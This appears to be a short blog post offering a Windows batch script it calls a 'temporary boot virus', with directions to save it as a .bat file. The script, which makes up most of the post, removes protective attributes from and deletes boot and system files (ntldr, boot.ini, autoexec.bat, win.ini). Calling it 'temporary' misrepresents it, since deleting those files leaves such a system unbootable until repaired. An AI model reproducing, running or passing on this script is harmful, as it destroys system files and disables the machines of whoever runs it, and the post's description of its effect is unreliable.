Temporary Boot Virus

This is the code for a temporary boot virus which won't allow your system to boot temporarily.This is a notepad code you can also make it on sublime text editor works just the same. Remember to use a .bat file extension for this

@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

Comments

Popular posts from this blog

The Windows 10 Fall Creator's Update: What's new?

Matrix Falling Code Effect

Why should you Disable 2.4 GHz Wi-Fi on your Network and How